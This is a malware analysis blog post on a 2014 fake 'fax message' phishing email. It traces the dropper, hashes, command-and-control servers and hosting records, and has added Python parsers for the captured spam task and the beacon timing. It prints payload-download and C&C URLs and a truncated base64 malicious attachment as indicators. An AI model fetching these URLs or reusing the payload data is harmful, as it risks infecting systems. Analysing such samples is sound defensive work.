Virus contained in e-mail “Fax message”

Message looks like this:

Fax Message [Caller-ID: 1-407-454-1519]

hxxp://hans-juergen-urban.de/inbox/get_message.php

You have received a 3 page fax at Tue, 25 Nov 2014 13:48:11 +0000.

* The reference number for this fax is chd_did11-10520192747-10397814691-268.

View this fax using your PDF reader.
Thank you for using the MyFax service!

The link generates a randomly named zip file along the lines of “fax_message2511_pdf<random>.zip”

Contained within the zip is a file called “fax_message2511_pdf.exe” (VirusTotal Report / Malwr Report – SHA256 “46a09679ac0519a59590402fc5496f5ed5753fa713c1c8ae2f3958bd342542a5”).

Upon running, it contacted 95.211.199.37 on port 37273 (a different port from the one Malwr picked up on):

http://95.211.199.37:37273/2511uk3/W7VM1/0/61-SP1/0/ (reverse DNS of “todeusm-1.data-xata.net”, which seems to be a domain associated with a Russian website)

inetnum: 95.211.192.0 – 95.211.199.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: http://www.leaseweb.com

It also then contacted

hxxp://faberomunicipal.com/images/3.pnk (VirusTotal report – SHA256 )

inetnum: 164.138.211.0 – 164.138.211.255
netname: CYBERNETICOS1
descr: cyberneticos set 4
country: ES
admin-c: DS10833-RIPE
tech-c: DS10833-RIPE

This is probably the payload. It seems to be encrypted or compressed.

It then closed itself and didn’t seem to do anything until the machine was rebooted, at which point it injected something into explorer.exe and also ran its own .exe with a random name (oCRKcjvfeAyUqGi.exe) in C:\Users\myuser\AppData\Local\ – this name seems to change on every boot.
VirusTotal Report / Malwr Report. SHA256 “c5181069961fbf7bba51323e9f7ed74288e8557e41d8c639f7bea94f8306da79”

Further communication from the .exe file is to:

https://46.4.61.148:1025/tUcG0
and
https://46.4.61.148:1025/tU.com=G0EDT

rDNS is “40434.maxided.com”, hosted in Germany at the notorious host Hetzner – sub-leased / resold by maxided.com:

inetnum: 46.4.61.128 – 46.4.61.191
netname: HETZNER-RZ13
descr: Hetzner Online AG
descr: Datacenter 13
country: DE

The above URL seems to contain some sort of spam e-mail content and destination addresses:

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 25 Nov 2014 14:54:32 GMT
Content-Length: 14098
Connection: keep-alive

uoKO6WHblJvAtypeHblJvAsend_to_allHblJvAsubjectHblJvALook the document
HblJvAcontentHblJvA<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Please review attached document.<br>
</body>
</html>
HblJvAuoKO6WuoKO6WHblJvAtypeHblJvAadditional_emailsHblJvAemailHblJvAlloyd.low@aol.comHblJvAemailHblJvAlamsdlkfm@gmx.comHblJvAuoKO6WuoKO6WHblJvAtypeHblJvAmessage_attachHblJvAattach_typeHblJvAfile_dataHblJvAattach_nameHblJvAdoc_9412_pdf.zipHblJvAattach_data_base64HblJvAUEsDBBQDAAAIAOV5eUWK6j981CYAAABeAAAQAAAAZG9jXzk0MTJfcGRmLnNjcuxWeVhUVRS/A4gDMTAWT81QR8NcMno6bgTZ1XgoCQooIIqQioVPcYGZUlNBZgjwOm5IWalFqKHigliCoA4Msugj0FwyU9RcLuGCSi6Jvs4dKDX76vv6t67O3d699/zO72wEjFuObBFCdvCTZYTyUXPD6J9bIvycO+9xRrscqrrkK/yruoyJmRqvmRU38924ibGayRNnzJip00yaoonTz9BMnaHxG[……SNIP………]rYTe4nO4mhxtrhQ3CEGi0W1jtoG2hbaldr12i1ab+117Z4a/jUy1sxes3nNdjV71BxSS18rU+3stQvX/lo7c538dYrVKVdHdBzuqHc84QiO2evmrquu27TuwXqB9egR01zIOTXhAC4pillTsaXYVuwodhF7iH3EASL5n345fQdQSwECPwMUAwAACADleXlFiuo/fNQmAAAAXgAAEAAAAAAAAAAAACCApIEAAAAAZG9jXzk0MTJfcGRmLnNjclBLBQYAAAAAAQABAD4AAAACJwAAAAA=HblJvAuoKO6WuoKO6WHblJvAtypeHblJvAclient_connection_idHblJvAid_stringHblJvA5186996108432692204HblJvAuoKO6W
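The body above is a delimited key/value structure: “uoKO6W” brackets each record and “HblJvA” separates keys and values, with a “type” field naming the record (send_to_all, additional_emails, message_attach, client_connection_id). Below is an added parser, not part of the original post, that pulls the recipient list and attachment out of such a capture and lists the ZIP members inside the base64 attachment; it assumes those two separators are fixed and runs on a constructed sample (stub ZIP, not the real attachment).

```python
import base64
import io
import zipfile

# Separators as seen in the captured response on this page (assumed fixed).
RECORD_SEP = "uoKO6W"
FIELD_SEP = "HblJvA"


def parse_spam_task(body: str) -> list:
    """Split a captured body into records; values are lists since keys repeat."""
    records = []
    for chunk in body.split(RECORD_SEP):
        tokens = [t for t in chunk.split(FIELD_SEP) if t != ""]
        if not tokens:
            continue  # empty gap between back-to-back record separators
        if len(tokens) % 2:
            raise ValueError("dangling key without value: %r" % tokens[-1])
        fields = {}
        for key, value in zip(tokens[0::2], tokens[1::2]):
            fields.setdefault(key.strip(), []).append(value.strip())
        records.append({"type": fields.pop("type", ["unknown"])[0], "fields": fields})
    return records


def attachment_members(records: list) -> dict:
    """Decode each base64 attachment and list the member names inside the ZIP."""
    out = {}
    for rec in records:
        if rec["type"] == "message_attach":
            data = base64.b64decode(rec["fields"]["attach_data_base64"][0])
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                out[rec["fields"]["attach_name"][0]] = zf.namelist()
    return out


def build_sample() -> str:
    """Constructed input mirroring the page's capture; the ZIP is a harmless stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("doc_9412_pdf.scr", b"stub bytes, not the real sample")
    b64 = base64.b64encode(buf.getvalue()).decode()
    fs, rs = FIELD_SEP, RECORD_SEP
    return (
        f"{rs}{fs}type{fs}send_to_all{fs}subject{fs}Look the document\n{fs}content{fs}"
        f"<html><body>Please review attached document.<br></body></html>\n{fs}{rs}"
        f"{rs}{fs}type{fs}additional_emails{fs}email{fs}a@example.com{fs}email{fs}b@example.net{fs}{rs}"
        f"{rs}{fs}type{fs}message_attach{fs}attach_type{fs}file_data{fs}attach_name{fs}"
        f"doc_9412_pdf.zip{fs}attach_data_base64{fs}{b64}{fs}{rs}"
        f"{rs}{fs}type{fs}client_connection_id{fs}id_string{fs}5186996108432692204{fs}{rs}"
    )
```

The member listing is the detail worth checking on a real capture: the attachment is named doc_9412_pdf.zip, but the member name bytes visible in the captured base64 (ZG9jXzk0MTJfcGRmLnNjc…) decode to doc_9412_pdf.scr.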

The injected process into explorer.exe has similar functionality to some previous malware I’ve seen.

Once again it talks SSL to a random IP to exfiltrate information. The HTTPS host is 195.154.231.222 (rDNS of “195-154-231-222.rev.poneytelecom.eu”).

inetnum: 195.154.128.0 – 195.154.255.255
netname: FR-ILIAD-ENTREPRISES-CUSTOMERS
descr: Iliad Entreprises Customers
country: FR

The SSL certificate was only generated on 21/Nov/2014, so this is a recently usurped or newly set up C&C host.

   2   False    + 0.610               True   0.470 s      GET     200     757       application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/5/cert/my.ip.address.redacted/                                                     
   3   False    + 1.141               True   0.470 s      GET     200     805       application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/0/Win_7_SP1_32bit/1067/my.ip.address.redacted/                                     
   4   False    + 1.719               True   0.736 s      GET     200     46.69 K   application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/5/httprdc/my.ip.address.redacted/                                                  
   5   False    + 0.000               True   2.408 s      GET     200     389       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/sroIXKxRXSRSDKjDmgQgDXPPUCgLkLa/my.ip.address.redacted/                          
   6   False    + 2.532               True   0.532 s      GET     200     3.50 K    application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/5/respparser/my.ip.address.redacted/                                               
   7   False    + 3.094               True   10.189 s     GET     200     154.31 K  application/x-tar         http://kneelerdesign.com.au/Scripts/omon.tar                                                                                                              
   8   False    + 3.125               True   0.470 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/14/NAT/Port%20restricted%20NAT/0/my.ip.address.redacted/                           
   9   False    + 3.125               True   0.501 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/14/user/myuser/0/my.ip.address.redacted/                                           
   10  False    + 3.657               True   0.469 s      GET     404     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/23/216827571/TiwMhgdcMlBrTLqwHOuRRyyFnkNoOXQ/my.ip.address.redacted/               
   11  False    + 8.172               True   1.704 s      POST    502     357       text/html                 https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/63/generalinfo/my.ip.address.redacted/                                             
   12  False    + 13.407              True   0.548 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/10/43/25692/3/my.ip.address.redacted/                                              
   16  False    + 14.391              True   0.860 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/NCiHHayeVLjidIEdGLqiUyuomCTAVVv/my.ip.address.redacted/                          
   17  False    + 210.313             False               GET                       (None)                    https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/                          
   18  False    + 255.313             False               GET                       (None)                    https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/                          
   19  False    + 315.313             True   0.720 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/                          
   20  False    + 511.094             True   0.517 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/WQoyhHBjOLykIbliIhFkamhGwnCtPPE/my.ip.address.redacted/                          
   21  False    + 706.704             True   0.735 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/QQLmWiqsHoRrQJrmRcRsjLPUEhiIgjw/my.ip.address.redacted/                          
   24  False    + 902.579             True   0.579 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/SbFALtcryJkXIXtxNsfIxwGQVYOmkwd/my.ip.address.redacted/                          
   25  False    + 1098.235            True   0.876 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/JObdmQuvPWlEKTHYiGGrBKEbfhSGQFo/my.ip.address.redacted/                       

Then it continues to wait and send periodic messages to the C&C server.
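To spot that check-in rhythm in a proxy or sandbox log, here is an added example (not from the original post) that parses rows like those above, splits the URL into its campaign / bot-ID / command path components, and reports the longest run of near-equal gaps between the “/1/” requests. The embedded rows are a trimmed copy of the log above with the column padding collapsed, and the URL layout is assumed from that log.

```python
import re
from statistics import median

# Constructed subset of the sandbox HTTP log shown on this page, with the
# column padding collapsed; host and bot-ID path component are as captured there.
LOG = """
5 False + 0.000 True 2.408 s GET 200 389 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/sroIXKxRXSRSDKjDmgQgDXPPUCgLkLa/my.ip.address.redacted/
12 False + 13.407 True 0.548 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/10/43/25692/3/my.ip.address.redacted/
16 False + 14.391 True 0.860 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/NCiHHayeVLjidIEdGLqiUyuomCTAVVv/my.ip.address.redacted/
17 False + 210.313 False GET (None) https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/
19 False + 315.313 True 0.720 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/
20 False + 511.094 True 0.517 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/WQoyhHBjOLykIbliIhFkamhGwnCtPPE/my.ip.address.redacted/
21 False + 706.704 True 0.735 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/QQLmWiqsHoRrQJrmRcRsjLPUEhiIgjw/my.ip.address.redacted/
24 False + 902.579 True 0.579 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/SbFALtcryJkXIXtxNsfIxwGQVYOmkwd/my.ip.address.redacted/
25 False + 1098.235 True 0.876 s GET 200 197 text/plain https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/JObdmQuvPWlEKTHYiGGrBKEbfhSGQFo/my.ip.address.redacted/
"""

# Row: id, flag, "+ offset", completed flag, ..., URL as the last token.
ROW = re.compile(r"^\s*\d+\s+\S+\s+\+\s*(?P<t>[\d.]+)\s+(?P<done>True|False)\b.*\s(?P<url>\S+)$")
# URL scheme assumed from the log: /<campaign>/<bot-id>/<command number>/...
PATH = re.compile(r"^https?://[^/]+/(?P<campaign>[^/]+)/(?P<bot>[^/]+)/(?P<cmd>\d+)/")

def parse_log(text):
    """Return (offset_seconds, completed, campaign, bot_id, cmd) per matching row."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW.match(line)
        p = PATH.match(m.group("url")) if m else None
        if not p:
            continue  # rows that do not follow the C&C URL scheme are ignored
        rows.append((float(m.group("t")), m.group("done") == "True",
                     p.group("campaign"), p.group("bot"), p.group("cmd")))
    return rows

def beacon_interval(rows, cmd="1", tolerance=0.1, min_run=3):
    """Longest run of consecutive gaps (between `cmd` requests) within tolerance
    of the run's first gap. Returns (gaps_in_run, median_gap) or None."""
    times = sorted(t for t, _, _, _, c in rows if c == cmd)
    gaps = [b - a for a, b in zip(times, times[1:])]
    best, run = [], []
    for g in gaps:
        if run and abs(g - run[0]) > tolerance * run[0]:
            run = []  # rhythm broke (retry, failed request, initial burst)
        run.append(g)
        if len(run) > len(best):
            best = run[:]
    return (len(best), round(median(best), 1)) if len(best) >= min_run else None
```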

There is also a cheeky request to http://kneelerdesign.com.au/Scripts/omon.tar – which seems to be another encrypted blob of data. (IP 113.52.128.4 – No reverse DNS.)

inetnum: 113.52.128.0 – 113.52.131.255
netname: HOSTCORP
descr: HostCorp Internet
country: AU
admin-c: HIna1-AP
tech-c: HIna1-AP

As before, it steals (among other information):

- The CPU info of the computer
- The user accounts on the system
- The programs installed on the system
- The services on the system, including driver services
